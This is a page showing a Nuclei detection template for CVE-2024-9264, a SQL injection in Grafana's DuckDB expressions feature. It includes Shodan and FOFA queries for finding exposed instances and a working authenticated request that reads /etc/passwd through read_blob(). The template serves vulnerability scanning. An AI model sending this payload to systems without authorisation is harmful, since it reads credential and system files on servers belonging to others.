Grafana Post-Auth DuckDB - SQL Injection To File Read

ID: CVE-2024-9264

Severity: critical

Author: princechaddha

Tags: cve,cve2024,grafana,sqli,lfr,authenticated

Description

The SQL Expressions experimental feature of Grafana allows for the evaluation of duckdb queries containing user input. These queries are insufficiently sanitized before being passed to duckdb, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack. The duckdb binary must be present in Grafana’s $PATH for this attack to function; by default, this binary is not installed in Grafana distributions.

YAML Source

id: CVE-2024-9264

info:
  name: Grafana Post-Auth DuckDB - SQL Injection To File Read
  author: princechaddha
  severity: critical
  description: |
    The SQL Expressions experimental feature of Grafana allows for the evaluation of `duckdb` queries containing user input. These queries are insufficiently sanitized before being passed to `duckdb`, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack. The `duckdb` binary must be present in Grafana's $PATH for this attack to function; by default, this binary is not installed in Grafana distributions.
  remediation: |
    Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
  reference:
    - https://x.com/nol_tech/status/1847639874909749443
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9264
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2024-9264
    cwe-id: CWE-94
    epss-score: 0.00043
    epss-percentile: 0.09691
  metadata:
    max-request: 2
    vendor: grafana
    product: grafana
    shodan-query:
      - http.title:"grafana"
      - cpe:"cpe:2.3:a:grafana:grafana"
    fofa-query:
      - app="grafana"
      - title="grafana"
    google-query: intitle:"grafana"
  tags: cve,cve2024,grafana,sqli,lfr,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        content-type: application/json

        {"user":"{{username}}","password":"{{password}}"}

    matchers:
      - type: word
        part: header
        words:
          - "grafana_session"
        internal: true

  - raw:
      - |
        POST /api/ds/query?ds_type=__expr__&expression=true&requestId=Q101 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "from": "1729313027261",
          "queries": [
            {
              "datasource": {
                "name": "Expression",
                "type": "__expr__",
                "uid": "__expr__"
              },
              "expression": "SELECT content FROM read_blob('/etc/passwd')",
              "hide": false,
              "refId": "B",
              "type": "sql",
              "window": ""
            }
          ],
          "to": "1729334627261"
        }

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:"

      - type: word
        part: body
        words:
          - '"data":{'
# digest: 4b0a00483046022100e17b48f30920a016740c875ecaedb7181c6f46102f3452c5bb6eb1801bc3344f022100f8bd0512c0ca86a68ec9065b4dc91d1ae1a23c2984790923b4e6e825763b795a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-9264.yaml"

View on Github